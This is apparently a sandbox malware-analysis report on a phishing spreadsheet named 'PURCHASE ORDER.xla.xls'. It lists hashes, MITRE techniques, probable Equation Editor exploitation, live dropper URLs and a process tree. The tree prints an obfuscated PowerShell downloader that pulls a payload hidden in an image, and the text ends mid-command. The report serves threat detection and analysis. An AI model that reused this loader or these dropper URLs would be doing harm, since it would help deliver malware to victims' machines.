451623c17212a8eb8a15d5f76032cd55e622ebf4dc6327c8d6f9fca6de3f20b9

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
23/08/2024, 05:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PURCHASE ORDER.xla.xls
Size

563KB
MD5

e21676432efe61e7e8f26ad8433a4eda
SHA1

b6437eb2b197d96e39f4e3ba6821b94fd2cde851
SHA256

451623c17212a8eb8a15d5f76032cd55e622ebf4dc6327c8d6f9fca6de3f20b9
SHA512

a759bb28537dc0afb3779878d88a9999f8bc3d8134e53e32e79cee03c6e3b6ce21eb3a2013e3d2cf2647370520243f2ca8640199e7ec38ee9eaa0086aa5d38a7
SSDEEP

12288:f0qB4ppth4pvp1KtyQEOgpd0fPkPPFY984UDWtzGdst0UkK7ioP:fGLth8p1sJgpaP6kYDWV/0HM

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
26	1868	EQNEDT32.EXE
28	1424	powershell.exe
29	1424	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
564	powershell.exe
1424	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Office\Common\Offline\Files\https://kutt.uk/dE00zz	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1868	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2088	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
564	powershell.exe
1424	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	564	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeShutdownPrivilege	2820	WINWORD.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2088	EXCEL.EXE
2088	EXCEL.EXE
2088	EXCEL.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE
2088	EXCEL.EXE
2088	EXCEL.EXE
2088	EXCEL.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2820 wrote to memory of 2320	2820	WINWORD.EXE	33
PID 2820 wrote to memory of 2320	2820	WINWORD.EXE	33
PID 2820 wrote to memory of 2320	2820	WINWORD.EXE	33
PID 2820 wrote to memory of 2320	2820	WINWORD.EXE	33
PID 1868 wrote to memory of 2304	1868	EQNEDT32.EXE	35
PID 1868 wrote to memory of 2304	1868	EQNEDT32.EXE	35
PID 1868 wrote to memory of 2304	1868	EQNEDT32.EXE	35
PID 1868 wrote to memory of 2304	1868	EQNEDT32.EXE	35
PID 2304 wrote to memory of 564	2304	WScript.exe	36
PID 2304 wrote to memory of 564	2304	WScript.exe	36
PID 2304 wrote to memory of 564	2304	WScript.exe	36
PID 2304 wrote to memory of 564	2304	WScript.exe	36
PID 564 wrote to memory of 1424	564	powershell.exe	38
PID 564 wrote to memory of 1424	564	powershell.exe	38
PID 564 wrote to memory of 1424	564	powershell.exe	38
PID 564 wrote to memory of 1424	564	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.xla.xls"
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2088

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2320

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1868
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\weneedgoodcakewithbuttermilksw.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪VQBy⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪9⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪JwBo⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bw⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪Og⥼ ⫣ ᭣ ₊ ⤪v⥼ ⫣ ᭣ ₊ ⤪C8⥼ ⫣ ᭣ ₊ ⤪aQBh⥼ ⫣ ᭣ ₊ ⤪Dg⥼ ⫣ ᭣ ₊ ⤪M⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪z⥼ ⫣ ᭣ ₊ ⤪DE⥼ ⫣ ᭣ ₊ ⤪M⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪0⥼ ⫣ ᭣ ₊ ⤪C4⥼ ⫣ ᭣ ₊ ⤪dQBz⥼ ⫣ ᭣ ₊ ⤪C4⥼ ⫣ ᭣ ₊ ⤪YQBy⥼ ⫣ ᭣ ₊ ⤪GM⥼ ⫣ ᭣ ₊ ⤪a⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪HY⥼ ⫣ ᭣ ₊ ⤪ZQ⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪G8⥼ ⫣ ᭣ ₊ ⤪cgBn⥼ ⫣ ᭣ ₊ ⤪C8⥼ ⫣ ᭣ ₊ ⤪Mg⥼ ⫣ ᭣ ₊ ⤪3⥼ ⫣ ᭣ ₊ ⤪C8⥼ ⫣ ᭣ ₊ ⤪aQB0⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪bQBz⥼ ⫣ ᭣ ₊ ⤪C8⥼ ⫣ ᭣ ₊ ⤪dgBi⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪Xw⥼ ⫣ ᭣ ₊ ⤪y⥼ ⫣ ᭣ ₊ ⤪D⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪Mg⥼ ⫣ ᭣ ₊ ⤪0⥼ ⫣ ᭣ ₊ ⤪D⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪Nw⥼ ⫣ ᭣ ₊ ⤪y⥼ ⫣ ᭣ ₊ ⤪DY⥼ ⫣ ᭣ ₊ ⤪Xw⥼ ⫣ ᭣ ₊ ⤪y⥼ ⫣ ᭣ ₊ ⤪D⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪Mg⥼ ⫣ ᭣ ₊ ⤪0⥼ ⫣ ᭣ ₊ ⤪D⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪Nw⥼ ⫣ ᭣ ₊ ⤪y⥼ ⫣ ᭣ ₊ ⤪DY⥼ ⫣ ᭣ ₊ ⤪LwB2⥼ ⫣ ᭣ ₊ ⤪GI⥼ ⫣ ᭣ ₊ ⤪cw⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪Go⥼ ⫣ ᭣ ₊ ⤪c⥼ ⫣ ᭣ ₊ ⤪Bn⥼ ⫣ ᭣ ₊ ⤪Cc⥼ ⫣ ᭣ ₊ ⤪Ow⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪Hc⥼ ⫣ ᭣ ₊ ⤪ZQBi⥼ ⫣ ᭣ ₊ ⤪EM⥼ ⫣ ᭣ ₊ ⤪b⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪bgB0⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪PQ⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪E4⥼ ⫣ ᭣ ₊ ⤪ZQB3⥼ ⫣ ᭣ ₊ ⤪C0⥼ ⫣ ᭣ ₊ ⤪TwBi⥼ ⫣ ᭣ ₊ ⤪Go⥼ ⫣ ᭣ ₊ ⤪ZQBj⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪BT⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪cwB0⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪bQ⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪E4⥼ ⫣ ᭣ ₊ ⤪ZQB0⥼ ⫣ ᭣ ₊ ⤪C4⥼ ⫣ ᭣ ₊ ⤪VwBl⥼ ⫣ ᭣ ₊ ⤪GI⥼ ⫣ ᭣ ₊ ⤪QwBs⥼ ⫣ ᭣ ₊ ⤪Gk⥼ ⫣ ᭣ ₊ ⤪ZQBu⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪Ow⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪Gk⥼ ⫣ ᭣ ₊ ⤪bQBh⥼ ⫣ ᭣ ₊ ⤪Gc⥼ ⫣ ᭣ ₊ ⤪ZQBC⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪9⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪J⥼ ⫣ ᭣ ₊ ⤪B3⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪YgBD⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪aQBl⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪EQ⥼ ⫣ ᭣ ₊ ⤪bwB3⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪b⥼ ⫣ ᭣ ₊ ⤪Bv⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪BE⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bh⥼ ⫣ ᭣ ₊ ⤪Cg⥼ ⫣ ᭣ ₊ ⤪J⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪VQBy⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪KQ⥼ ⫣ ᭣ ₊ ⤪7⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪aQBt⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪ZwBl⥼ ⫣ ᭣ ₊ ⤪FQ⥼ ⫣ ᭣ ₊ ⤪ZQB4⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪9⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪WwBT⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪cwB0⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪bQ⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪FQ⥼ ⫣ ᭣ ₊ ⤪ZQB4⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪LgBF⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪YwBv⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪aQBu⥼ ⫣ ᭣ ₊ ⤪Gc⥼ ⫣ ᭣ ₊ ⤪XQ⥼ ⫣ ᭣ ₊ ⤪6⥼ ⫣ ᭣ ₊ ⤪Do⥼ ⫣ ᭣ ₊ ⤪VQBU⥼ ⫣ ᭣ ₊ ⤪EY⥼ ⫣ ᭣ ₊ ⤪O⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪Ec⥼ ⫣ ᭣ ₊ ⤪ZQB0⥼ ⫣ ᭣ ₊ ⤪FM⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪By⥼ ⫣ ᭣ ₊ ⤪Gk⥼ ⫣ ᭣ ₊ ⤪bgBn⥼ ⫣ ᭣ ₊ ⤪Cg⥼ ⫣ ᭣ ₊ ⤪J⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪QgB5⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪ZQBz⥼ ⫣ ᭣ ₊ ⤪Ck⥼ ⫣ ᭣ ₊ ⤪Ow⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bh⥼ ⫣ ᭣ ₊ ⤪HI⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪BG⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪PQ⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪Cc⥼ ⫣ ᭣ ₊ ⤪P⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪8⥼ ⫣ ᭣ ₊ ⤪EI⥼ ⫣ ᭣ ₊ ⤪QQBT⥼ ⫣ ᭣ ₊ ⤪EU⥼ ⫣ ᭣ ₊ ⤪Ng⥼ ⫣ ᭣ ₊ ⤪0⥼ ⫣ ᭣ ₊ ⤪F8⥼ ⫣ ᭣ ₊ ⤪UwBU⥼ ⫣ ᭣ ₊ ⤪EE⥼ ⫣ ᭣ ₊ ⤪UgBU⥼ ⫣ ᭣ ₊ ⤪D4⥼ ⫣ ᭣ ₊ ⤪Pg⥼ ⫣ ᭣ ₊ ⤪n⥼ ⫣ ᭣ ₊ ⤪Ds⥼ ⫣ ᭣ ₊ ⤪J⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪BG⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪PQ⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪Cc⥼ ⫣ ᭣ ₊ ⤪P⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪8⥼ ⫣ ᭣ ₊ ⤪EI⥼ ⫣ ᭣ ₊ ⤪QQBT⥼ ⫣ ᭣ ₊ ⤪EU⥼ ⫣ ᭣ ₊ ⤪Ng⥼ ⫣ ᭣ ₊ ⤪0⥼ ⫣ ᭣ ₊ ⤪F8⥼ ⫣ ᭣ ₊ ⤪RQBO⥼ ⫣ ᭣ ₊ ⤪EQ⥼ ⫣ ᭣ ₊ ⤪Pg⥼ ⫣ ᭣ ₊ ⤪+⥼ ⫣ ᭣ ₊ ⤪Cc⥼ ⫣ ᭣ ₊ ⤪Ow⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bh⥼ ⫣ ᭣ ₊ ⤪HI⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪BJ⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪Hg⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪9⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪J⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪V⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪Hg⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪Ek⥼ ⫣ ᭣ ₊ ⤪bgBk⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪e⥼ ⫣ ᭣ ₊ ⤪BP⥼ ⫣ ᭣ ₊ ⤪GY⥼ ⫣ ᭣ ₊ ⤪K⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bh⥼ ⫣ ᭣ ₊ ⤪HI⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪BG⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪Ck⥼ ⫣ ᭣ ₊ ⤪Ow⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪bgBk⥼ ⫣ ᭣ ₊ ⤪Ek⥼ ⫣ ᭣ ₊ ⤪bgBk⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪e⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪D0⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪Gk⥼ ⫣ ᭣ ₊ ⤪bQBh⥼ ⫣ ᭣ ₊ ⤪Gc⥼ ⫣ ᭣ ₊ ⤪ZQBU⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪e⥼ ⫣ ᭣ ₊ ⤪B0⥼ ⫣ ᭣ ₊ ⤪C4⥼ ⫣ ᭣ ₊ ⤪SQBu⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪ZQB4⥼ ⫣ ᭣ ₊ ⤪E8⥼ ⫣ ᭣ ₊ ⤪Zg⥼ ⫣ ᭣ ₊ ⤪o⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪ZQBu⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪RgBs⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪Zw⥼ ⫣ ᭣ ₊ ⤪p⥼ ⫣ ᭣ ₊ ⤪Ds⥼ ⫣ ᭣ ₊ ⤪J⥼ ⫣ ᭣ ₊ ⤪Bz⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪YQBy⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪SQBu⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪ZQB4⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪LQBn⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪w⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪LQBh⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪ZQBu⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪SQBu⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪ZQB4⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪LQBn⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bh⥼ ⫣ ᭣ ₊ ⤪HI⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪BJ⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪Hg⥼ ⫣ ᭣ ₊ ⤪Ow⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bh⥼ ⫣ ᭣ ₊ ⤪HI⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪BJ⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪Hg⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪r⥼ ⫣ ᭣ ₊ ⤪D0⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bh⥼ ⫣ ᭣ ₊ ⤪HI⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪BG⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪C4⥼ ⫣ ᭣ ₊ ⤪T⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪ZwB0⥼ ⫣ ᭣ ₊ ⤪Gg⥼ ⫣ ᭣ ₊ ⤪Ow⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪GI⥼ ⫣ ᭣ ₊ ⤪YQBz⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪Ng⥼ ⫣ ᭣ ₊ ⤪0⥼ ⫣ ᭣ ₊ ⤪Ew⥼ ⫣ ᭣ ₊ ⤪ZQBu⥼ ⫣ ᭣ ₊ ⤪Gc⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bo⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪PQ⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪ZQBu⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪SQBu⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪ZQB4⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪LQ⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪cwB0⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪cgB0⥼ ⫣ ᭣ ₊ ⤪Ek⥼ ⫣ ᭣ ₊ ⤪bgBk⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪e⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪7⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪YgBh⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪ZQ⥼ ⫣ ᭣ ₊ ⤪2⥼ ⫣ ᭣ ₊ ⤪DQ⥼ ⫣ 